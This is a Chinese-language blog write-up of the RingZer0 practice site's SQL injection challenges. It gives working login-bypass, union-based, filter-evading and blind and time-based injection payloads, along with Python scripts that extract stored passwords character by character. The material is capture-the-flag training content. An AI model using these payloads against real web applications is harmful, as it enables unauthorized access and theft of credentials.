Sky's blog

RingZer0-web-sql系列记录

Word count: 2,429 / Reading time: 13 min
2018/02/27 Share

前记

最近发现了一个练习网站~于是先做sql喽~,好的题目我会标注good question,233333方便日后自己研究,也帮大佬们省去看基础题的时间啦~

Most basic SQLi pattern.(point 1)

签到题:

1
2
username: admin'#
password: 1

可以得到flag:FLAG-238974289383274893

ACL rulezzz the world.(point 2)

随手测试

1
username=admin'

得到

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4

随手闭合一下

1
username=admin' or 1#

得到flag:FLAG-sdfoip340e89rfuj34woit

Login portal 1(point 2)

过滤了

1
2
3
#
--
=

其他没测试,直接随手pass

1
username=admin' or 'a' like 'a&password=1

即可拿到flag:FLAG-4f885o1dal0q1huj6eaxuatcvn

Random Login Form(point 2)

随手试了一下二次注入,发现有点不像
于是进行长度截断
注册

1
2
username=admin                                    1
password=1

登录

1
2
username=admin
password=1

得到flag:FLAG-0Kg64o8M9gPQfH45583Mc0jc3u

Just another login form(point 2)(good question)

尝试了一下无果,于是尝试联合注入

1
2
username = admin' union select md5(1),md5(1),md5(1)#
password = 1

得到回显:Bad search filter
搜索发现是LDAP的特定错误
于是登录

1
2
username = *
password = *

得到flag:FLAG-38i65201RR4B5g1oAm05fHO0QP
这是一个值得研究的点,默默记下了~最近的sql注入很少见,记得以前XCTF联赛中出现过~

Po po po po postgresql(point 2)

随手试试

1
username=admin' or 'a' like 'a&password=1

回显

1
2
ERROR:  invalid input syntax for type boolean: "admin"
LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...

于是闭合

1
username=admin') or 'a' like 'a') -- &password=1

得到flag:FLAG-mdeq68jNN88xLB1o2m8V33Ld

0 Day Store(point 3)

题太卡了……点一下等一年:)
我想还是得先放放~

Don’t mess with Noemie; she hates admin!(point 3)

尝试

1
username = admin' or sleep(5) or 'a' like 'a

发现sleep成功
说明闭合有效
那么直接刚

1
username = admin' or 'a' like 'a

发现登录失败
那么猜想后台语句

1
$sql = select * from users where username='$username' and password = '$password'

所以我们尝试

1
2
username = 1' or 1 or '
password = 1

带入即

1
select * from users where username='1' or 1 or '' and password = '1'

即可成功绕过
得到flag:FLAG-Yk3Hfovvb5kALU9hI2545MaY

What’s the definition of NULL(point 3)(good question)

看到url:?id=MQ==
明显是base64
解一下,发现是:id=1
随手测试

1
2
id = 1'#
id = MScj

得到

1
SQLite Database error please try again later.

然后自己测试了很久无果
回到起点,想起来他有描述

1
Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)

看来后台sql的确是这么写的

1
WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)

构造

1
0) OR (ID IS NULL) OR (1=2

带入得:

1
WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)

编码一下

1
?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=

得到flag:FLAG-sQFYzqfxbZhAj04NyCCV8tqA
这个题也挺有意思的,值得研究一下~

Login portal 2(point 3)

上去就尝试

1
2
username = 1' or 1 or '
password = 1

毕竟老套路
回显

1
Wrong password for impossibletoguess.

发现impossibletoguess很可疑
可能是个用户名,竟然回显了,那试试union

1
2
username = 1' union select 1,2#
password = 1

回显

1
Wrong password for 1.

剩下的就是联合注入了

1
2
3
4
5
6
7
8
1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Wrong password for users.
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
Wrong password for username,password.
1' union select (select username from users limit 0,1),2#
Wrong password for impossibletoguess.
1' union select (select password from users limit 0,1),2#
Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.

长度40的密码,显然不是md5,猜测为sha1
联合注入

1
2
username = impossibletoguess' union select sha1(1),sha1(1)#
password = 1

登录成功,得到flag:FLAG-wlez73yxtkae9mpr8aerqay7or

Quote of the day(point 4)

随手测试id

1
2
?q=2'
No result found for id "2'"

发现可以回显,尝试Union,发现空格被过滤,用%0a绕过

1
2
3
?q=2%0aunion%0aselect%0a1,2#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: 2

然后老套路即可:

1
2
3
4
5
6
7
8
9
10
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(
TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: alkdjf4iu,quotes
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: id,flag
?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

over~

Thinking outside the box is the key(point 4)

随手尝试

1
?id=2’

得到

1
SQLite Database error please try again later.

知道了是SQLite
继续测试

1
2
3
4
5
6
?id=2 and 1=2 union select 1,2 from sqlite_master
2
?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
3.8.7.1
?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
random_stuff

依次类推,得到所有表名

1
2
3
4
random_stuff
ajklshfajks
troll
aatroll

我选择ajklshfajks
根据之前的经验,应该是flag字段了

1
2
?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
FLAG-13lIBUTHNFLEprz2KKMx6yqV

over~

No more hacking for me!(point 4)

好坑,f12源代码里有说明

1
2
3
<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->

我说我为什么一直做不出来:(
发现这一点后就很容易了:

1
2
3
4
5
6
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527 and tbl_name=%252527random_data%252527 limit 0,1 --

random_data CREATE TABLE random_data (id int, message varchar(50), display int)

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --

即可得到flag

1
FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE

Quote of the day reloaded(point 5)

感觉题目是不是有点脑洞?还是我没发现
尝试来尝试去,发现这样可以成功

1
2
3
?q=3\&s=ununionion select 1,2%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: 2

union要双写绕过

1
2
3
4
5
6
7
8
9
?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: qdyk5,quotes
?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: id,flag
?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3

over~
(注:虽然做出来了,还是觉得摸不着头脑,感觉关联性不强啊,我也是随手试出来的= =)

Hot Single Mom(point 6)

看到描述

1
2
Get laid or get lazy it's up to you 
Find online hot single Mom

就知道不是什么正经题目,果然网站挂了(滑稽)
但是有说明题目来源:GoSecure CTF 2014
搜索了一下

1
https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6

应该是道不错的注入题目
有flag:FLAG-wBGc5g147MuVQuC28L9Tw8H8HF

Login portal 3(point 6)

这题我用了盲注,但是目前为止这是第一道用盲注的题,所以不知道是不是做麻烦了~
脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests
import string
url = "https://ringzer0team.com/challenges/5"
cookie = {
"PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081"
}
flag = ""
for i in range(1,1000):
print "i:",i
for j in range(33,127):
#for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
data = {
#"username":"1' or (substr((database()),%s,1)='%s') and 'a'='a"%(i,j), login3
#"username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j), users
#"username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),username,password
"username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
"password":"1" #SQL1nj3ct10nFTW
}

r = requests.post(data=data,url=url,cookies=cookie)
if "Invalid username / password" in r.content:
flag += chr(j)
print flag
break

列名我没跑(滑稽脸),毕竟知道了他的套路,猜测是password,一猜就中~~
最后得到密码

1
SQL1nj3ct10nFTW

登录拿到flag:FLAG-vgnvokjmi3fgx0s23iv5x8n2w2

When it’s lite it’s not necessarily easy(point 6)

随手测试

1
2
username = 1' or sleep(5) or 'a'='a
password = 1

发现报错

1
SQLite Database error please try again later. Impossible to fetch username & password from users table

这也省事了,直接把列名,表名都弄出来了
于是直接取password进行盲注即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
import string
url = "https://ringzer0team.com/challenges/19"
cookie = {
"PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081"
}
flag = ""
for i in range(1,1000):
print "i:",i
for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
data = {
"username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
"password":"1" #4dm1nzP455
}

r = requests.post(data=data,url=url,cookies=cookie)
if "Invalid username / password" in r.content:
flag += j
print flag
break

得到密码

1
4dm1nzP455

登录拿到flag:FLAG-rL4t5LRMwjacD82G9vpAd6Gm

Internet As A Service(point 7)

疯狂测试后得到payload:

1
/?s = 1'<0e0union select 1,2,3#

然后老套路即可

1
2
3
4
5
6
7
8
9
?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
iaas
?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
iaas
rz_flag
?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
flag
?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj

over~~

Login portal 4(point 7)

这题用了时间盲注
脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
url = "https://ringzer0team.com/challenges/6"
cookie = {
"PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081",
"_gat":"1"
}
flag = ""
for i in range(1,1000):
for j in range(33,127):
print "i:", i,"j:",j
data = {
"username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
"password":"1"
}
try:
r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
except:
flag += chr(j)
print flag
break

得到密码:

1
UrASQLi1337!

登录后拿到flag

1
FLAG-70ygerntbicjdzrxmm0rmk0xx2

Size DOES matter(point 7)

很遗憾,又一个网站挂了~~

/etc/passwd(point 7)

同上,题目挂了,放在不同端口上
但是两个题都是/etc/passwd,可能是load_file()吧

Groups of hacker(point 7)

The useless search tool(point 8)

CATALOG
  1. 1. 前记
  2. 2. Most basic SQLi pattern.(point 1)
  3. 3. ACL rulezzz the world.(point 2)
  4. 4. Login portal 1(point 2)
  5. 5. Random Login Form(point 2)
  6. 6. Just another login form(point 2)(good question)
  7. 7. Po po po po postgresql(point 2)
  8. 8. 0 Day Store(point 3)
  9. 9. Don’t mess with Noemie; she hates admin!(point 3)
  10. 10. What’s the definition of NULL(point 3)(good question)
  11. 11. Login portal 2(point 3)
  12. 12. Quote of the day(point 4)
  13. 13. Thinking outside the box is the key(point 4)
  14. 14. No more hacking for me!(point 4)
  15. 15. Quote of the day reloaded(point 5)
  16. 16. Hot Single Mom(point 6)
  17. 17. Login portal 3(point 6)
  18. 18. When it’s lite it’s not necessarily easy(point 6)
  19. 19. Internet As A Service(point 7)
  20. 20. Login portal 4(point 7)
  21. 21. Size DOES matter(point 7)
  22. 22. /etc/passwd(point 7)
  23. 23. Groups of hacker(point 7)
  24. 24. The useless search tool(point 8)